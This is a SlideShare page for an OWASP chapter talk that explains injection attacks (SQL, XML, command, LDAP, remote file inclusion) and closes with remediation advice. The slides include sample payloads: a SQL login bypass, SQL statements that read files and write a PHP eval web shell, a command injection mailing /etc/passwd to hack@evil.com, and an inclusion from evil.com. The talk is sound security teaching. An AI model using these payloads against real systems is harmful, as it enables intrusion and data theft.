SlideShare a Scribd company logo

OWASP A1 Injection - Understanding and Preventing the #1 Web Application Vulnerability

Download as PPTX, PDF
Michael Hendrickx
Michael Hendrickx

A short talk I gave in a get together for the Owasp UAE chapter about the top 10's A1: Injection.

Technology
1 of 31
Owasp A1: Injection 31 March 2014: Dubai, UAE
About Me • Who am I? – Michael Hendrickx – Information Security Consultant, currently working for UAE Federal Government. – Assessments, Security Audits, secure coding
• Owasp Top 10 – 2013 – A1: Injection – A2: Broken Authentication and Session Mgmt – A3: Cross Site Scripting – A4: Insecure Direct Object References – A5: Security Misconfiguration – A6: Sensitive Data Exposure – A7: Missing Function Level Access Control – A8: Cross Site Request Forgery – A9: Using Components with Known Vulns – A10: Invalidated Redirects and Forwards
How bad is it? • Oct ‘13: 100k $ stolen from a California ISP http://thehackernews.com/2013/10/hacker-stole-100000-from-users- of.html • Jun ‘13: Hackers cleared Turkish people’s bills for water, gas, telephone… http://news.softpedia.com/news/RedHack-Breaches-Istanbul- Administration-Site-Hackers-Claim-to-Have-Erased-Debts-364000.shtml • Nov ‘12: 150k Adobe user accounts stolen http://www.darkreading.com/attacks-breaches/adobe-hacker-says- he-used-sql-injection/240134996 • Jul ‘12: 450k Yahoo! User accounts stolen http://www.cbsnews.com/news/yahoo-reportedly-hacked-is-your- account-safe/
What is Injection? • Web applications became more complex – Database driven – Extra functionality (email, ticket booking, ..) • Submitting data has a special meaning to underlying technologies • Mixing commands and data. • Types: – SQL Injection – XML Injection – Command Injection Web DBOS Backend System
Injection analogy • A case is filed against me • I write my name as “Michael, you are free to go” • Judge announces case: “Calling Michael, you are free to go.” • Bailiff lets me go. Mix of “data” and “commands”.
Injection Fails Mix of “data” and “commands”.
IT underlying technology? • A webserver parses and “pass on” data Web Server http://somesite.com/msg.php?id=8471350 DB OS Script performs business logic and parses messages to backend. “Hey, get me a message from the DB with id 8471350”
SQL Injection • Dynamic script to look up data in DB Web Server http://somesite.com/login.php?name=michael&password=secret123 DB SELECT * FROM users WHERE name = ’michael’ AND password = ‘secret123’ http://somesite.com/msg.aspx?id=8471350 SELECT * FROM messages WHERE id = 8471350 Get indirect access to the database
SQL Injection • Insert value with ’ (single quote) – Single quote is delimiter for SQL queries Web Server http://somesite.com/login.php?login=mich’ael&password=secret123 DB Query is incorrectly, will throw error (if not suppressed). SELECT * FROM users WHERE name = ’mich’ael’ AND password = ‘secret123’
SQL Injection • Insert value with ’ (single quote) – Single quote is delimiter for SQL queries Web Server http://somesite.com/login.php?login=mich’ael&password=secret123 DB Query is incorrectly, will throw error (if not suppressed). SELECT * FROM users WHERE name = ’mich’ael’ AND password = ‘secret123’
SQL Injection • Insert value with ’ (single quote) Web Server http://somesite.com/login.php?login=michael&password=test’ OR ’a’ = ’a DB SELECT * FROM users WHERE name = ’michael’ AND password = ’test ’ OR ‘a’ = ‘a’ ‘a’ will always equal ‘a’, and thus log in this user.
SQL Injection • More advanced possibilities: – Read files*: • MySQL: SELECT HEX(LOAD_FILE(‘/var/www/site.com/admin/.htpasswd’)) INTO DUMPFILE ‘/var/www/site.com/htdocs/test.txt’; • MS SQL: CREATE TABLE newfile(data text); ... BULK INSERT newfile FROM ‘C:secretfile.dat’ WITH (CODEPAGE=‘RAW’, FIELDTERMINATOR=‘|’,ROWTERMINATOR=‘---’); *: If you have the right privileges
SQL Injection • Write files – MySQL: CREATE TABLE tmp(data longblog); INSERT INTO tmp(data) VALUES(0x3c3f7068); UPDATE tmp SET data=CONCAT(data, 0x20245f...); <?php $_REQUEST[e] ? eval(base64_decode($_REQUEST[e])); exit;?> ... SELECT data FROM tmp INTO DUMPFILE ‘/var/www/site.com/htdocs/test.php’; – MS SQL: CEXEC xp_cmdshell(‘echo ... >> backdoor.aspx’); *: Again, If you have the right privileges
SQL Injection: SQLMap • SQL Map will perform attacks on target. • Dumps entire tables • Even entire databases. • Stores everything in CSV • More info on http://sqlmap.org
HTML Injection • Possible to include HTML tags into fields • Used to render “special” html tags where normal text is expected • XSS possible, rewrite the DOM
HTML Injection • Possible to insert iframes, fake forms, JS, … • Can be used in phishing attack Button goes to different form, potentially stealing credentials.
XML Injection • Web app talks to backend web services • Web app’s logic converts parameters to XML web services (as SOAP, …) Web Server Web service Web service DB Backend
XML Injection http://somesite.com/create.php?name=michael&email=mh@places.ae <?xml version=“1.0” encoding=“ISO-8859-1” ?> <user> <status>new</status> <admin>false</admin> <date>25 Jan 2014, 13:10:01</date> <name>$name</name> <email>$email</email> </user> http://somesite.com/create.php?name=michael&email=a@b.c</email><admin>true</a dmin><email>mh@places.ae <?xml version=“1.0” encoding=“ISO-8859-1” ?> <user> <status>new</status> <admin>false</admin> <date>25 Jan 2014, 13:24:48</date> <name>michael</name> <email>a@b.c</email><admin>true</admin><email>mh@places.ae</email> </user> Web app to create a new user
Command Injection • Web application performs Operating System tasks – Execute external programs / scripts – List files – Send email Web Server OS
Command Injection • Dynamic script to share article Web Server DBhttp://somesite.com/share.php?to=mh@places.ae OS $ echo “check this out” | mail –s “share” mh@places.ae $ echo “check this out” | mail –s “share” mh@places.ae; mail hack@evil.com < /etc/passwd http://somesite.com/share.php?to=mh@places.ae;+mail+hack@evil.com+<+/etc/passwd
LDAP Injection • Lightweight Directory Access Protocol • LDAP is used to access information directories – Users – User information – Software – Computers Web Server LDAP Server
LDAP Injection • Insert special characters, such as (, |, &, *, … • * (asterisk) allows listing of all users http://www.networkdls.com/articles/ldapinjection.pdf
Remote File Injection • Scripts include other files to extend functionality • Why? Clarity, Reuse functionality – PHP: • include(), require(), require_once(), … – Aspx: • <!-- #include “…” --> – JSP: • <% @include file=“…” %>
Remote File Injection • Color chooser • Color will load new file with color codes (blue.php, red.php, …) • Attacker can upload malicious PHP file to an external server http://somesite.com/mypage.php?color=blue <?php if(isset($_GET[„color‟])){ include($_GET[„color‟].„.php‟); } ?> http://somesite.com/mypage.php?color=http://evil.com/evil.txt Will fetch and load http://evil.com/evil.txt.php
Remote File Injection • Theme chooser • Can input external HTML files – That can contain JavaScript, XSS, rewrite the DOM, etc... • Also verify cookie contents, … http://somesite.com/set_theme.php?theme=fancy <link href=“/themes/<? print $_COOKIE[„theme‟] ?>.css” rel=“stylesheet” type=“text/css” />
Remediation • Implement Web Application Firewall (WAF) • Prevents most common attacks – Not 100% foolproof • Make sure it can decrypt SSL Web Server DBWAF
Remediation • Validate user input, all input: – Never trust user input, ever. – Even stored input (for later use) – Force formats (numbers, email addresses, dates…) – HTTP form fields, HTTP referers, cookies, … • Apply secure coding standards – Use prepared SQL statements – Vendor specific guidelines – OWASP secure coding practices: https://www.owasp.org/images/0/08/OWASP_SCP_Quick_Reference_Guide_v2.pdf
Remediation • Adopt least-privilege policies – Give DB users least privileges – Use multiple DB users – Run processes with restricted privileges – Restrict permissions on directories • Do your web directories really need to be writable? • Run in sandboxed environment • Suppress error messages • Enable exception notifications – If something strange happens, reset session and notify administrator.
Summary • Don’t trust your user input. • Don’t trust your user input. • Adopt secure coding policies • Implement defense in depth • Do log analysis to detect anomalies • And don’t trust your user input.
Thank you! Michael Hendrickx me@michaelhendrickx.com @ndrix

Recommended

Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with examplePrateek Chauhan
 
Web application vulnerabilities
Web application vulnerabilitiesWeb application vulnerabilities
Web application vulnerabilitiesebusinessmantra
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryDaniel Miessler
 
Directory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksDirectory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksRaghav Bisht
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 

Recommended

Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with examplePrateek Chauhan
 
Web application vulnerabilities
Web application vulnerabilitiesWeb application vulnerabilities
Web application vulnerabilitiesebusinessmantra
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryDaniel Miessler
 
Directory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksDirectory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksRaghav Bisht
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing Priyanka Aash
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 
Xss attack
Xss attackXss attack
Xss attackManjushree Mashal
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissanceNishaYadav177
 
SQL Injection
SQL InjectionSQL Injection
SQL InjectionAsish Kumar Rath
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017TriNimbus
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
Insecure direct object reference (null delhi meet)
Insecure direct object reference (null delhi meet)Insecure direct object reference (null delhi meet)
Insecure direct object reference (null delhi meet)Abhinav Mishra
 
Os Command Injection Attack
Os Command Injection AttackOs Command Injection Attack
Os Command Injection AttackRaghav Bisht
 
Sql injection
Sql injectionSql injection
Sql injectionNikunj Dhameliya
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacksDefconRussia
 
Sql injection in cybersecurity
Sql injection in cybersecuritySql injection in cybersecurity
Sql injection in cybersecuritySanad Bhowmik
 
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityMichael Coates
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 

More Related Content

What's hot

Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing Priyanka Aash
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissanceNishaYadav177
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017TriNimbus
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
Insecure direct object reference (null delhi meet)
Insecure direct object reference (null delhi meet)Insecure direct object reference (null delhi meet)
Insecure direct object reference (null delhi meet)Abhinav Mishra
 
Os Command Injection Attack
Os Command Injection AttackOs Command Injection Attack
Os Command Injection AttackRaghav Bisht
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacksDefconRussia
 
Sql injection in cybersecurity
Sql injection in cybersecuritySql injection in cybersecurity
Sql injection in cybersecuritySanad Bhowmik
 

What's hot (20)

Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
 
Xss attack
Xss attackXss attack
Xss attack
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissance
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
 
Insecure direct object reference (null delhi meet)
Insecure direct object reference (null delhi meet)Insecure direct object reference (null delhi meet)
Insecure direct object reference (null delhi meet)
 
Os Command Injection Attack
Os Command Injection AttackOs Command Injection Attack
Os Command Injection Attack
 
Sql injection
Sql injectionSql injection
Sql injection
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and Security
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacks
 
Sql injection in cybersecurity
Sql injection in cybersecuritySql injection in cybersecurity
Sql injection in cybersecurity
 

Similar to OWASP A1 Injection - Understanding and Preventing the #1 Web Application Vulnerability

Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityMichael Coates
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
Website Hacking and Preventive Measures
Website Hacking and Preventive MeasuresWebsite Hacking and Preventive Measures
Website Hacking and Preventive MeasuresShubham Takode
 
SQL Injection and DoS
SQL Injection and DoSSQL Injection and DoS
SQL Injection and DoSEmil Tan
 
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013 Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013 Lostar
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013tmd800
 
Open source security
Open source securityOpen source security
Open source securitylrigknat
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012ZIONSECURITY
 
Unique Features of SQL Injection in PHP Assignment
Unique Features of SQL Injection in PHP AssignmentUnique Features of SQL Injection in PHP Assignment
Unique Features of SQL Injection in PHP AssignmentLesa Cote
 
Drupal security
Drupal securityDrupal security
Drupal securityTechday7
 
WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013Thor Kristiansen
 
Web application attacks
Web application attacksWeb application attacks
Web application attackshruth
 
Web application security part 01
Web application security part 01Web application security part 01
Web application security part 01G Prachi
 

Similar to OWASP A1 Injection - Understanding and Preventing the #1 Web Application Vulnerability (20)

Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
null Bangalore meet - Php Security
null Bangalore meet - Php Securitynull Bangalore meet - Php Security
null Bangalore meet - Php Security
 
Website Hacking and Preventive Measures
Website Hacking and Preventive MeasuresWebsite Hacking and Preventive Measures
Website Hacking and Preventive Measures
 
SQL Injection and DoS
SQL Injection and DoSSQL Injection and DoS
SQL Injection and DoS
 
Lets Make our Web Applications Secure
Lets Make our Web Applications SecureLets Make our Web Applications Secure
Lets Make our Web Applications Secure
 
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013 Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
 
PHP and MySQL
PHP and MySQLPHP and MySQL
PHP and MySQL
 
Open source security
Open source securityOpen source security
Open source security
 
Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding Guide
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012
 
Unique Features of SQL Injection in PHP Assignment
Unique Features of SQL Injection in PHP AssignmentUnique Features of SQL Injection in PHP Assignment
Unique Features of SQL Injection in PHP Assignment
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
 
WebApps_Lecture_15.ppt
WebApps_Lecture_15.pptWebApps_Lecture_15.ppt
WebApps_Lecture_15.ppt
 
Drupal security
Drupal securityDrupal security
Drupal security
 
WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
 
Web application security part 01
Web application security part 01Web application security part 01
Web application security part 01
 

More from Michael Hendrickx

ECrime presentation - A few bits about malware
ECrime presentation - A few bits about malwareECrime presentation - A few bits about malware
ECrime presentation - A few bits about malwareMichael Hendrickx
 
Social Engineering Trickx - Owasp Doha 2015
Social Engineering Trickx - Owasp Doha 2015Social Engineering Trickx - Owasp Doha 2015
Social Engineering Trickx - Owasp Doha 2015Michael Hendrickx
 
Social Engineering - Help AG spotlight 15Q2
Social Engineering - Help AG spotlight 15Q2Social Engineering - Help AG spotlight 15Q2
Social Engineering - Help AG spotlight 15Q2Michael Hendrickx
 
Help AG spot light - social engineering
Help AG spot light - social engineeringHelp AG spot light - social engineering
Help AG spot light - social engineeringMichael Hendrickx
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Michael Hendrickx
 

More from Michael Hendrickx (7)

ECrime presentation - A few bits about malware
ECrime presentation - A few bits about malwareECrime presentation - A few bits about malware
ECrime presentation - A few bits about malware
 
The Cross Window redirect
The Cross Window redirectThe Cross Window redirect
The Cross Window redirect
 
Social Engineering Trickx - Owasp Doha 2015
Social Engineering Trickx - Owasp Doha 2015Social Engineering Trickx - Owasp Doha 2015
Social Engineering Trickx - Owasp Doha 2015
 
Social Engineering - Help AG spotlight 15Q2
Social Engineering - Help AG spotlight 15Q2Social Engineering - Help AG spotlight 15Q2
Social Engineering - Help AG spotlight 15Q2
 
Help AG spot light - social engineering
Help AG spot light - social engineeringHelp AG spot light - social engineering
Help AG spot light - social engineering
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)
 
Webpage Proxying
Webpage ProxyingWebpage Proxying
Webpage Proxying
 

Recently uploaded

SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxBkGupta21
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 

Recently uploaded (20)

SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
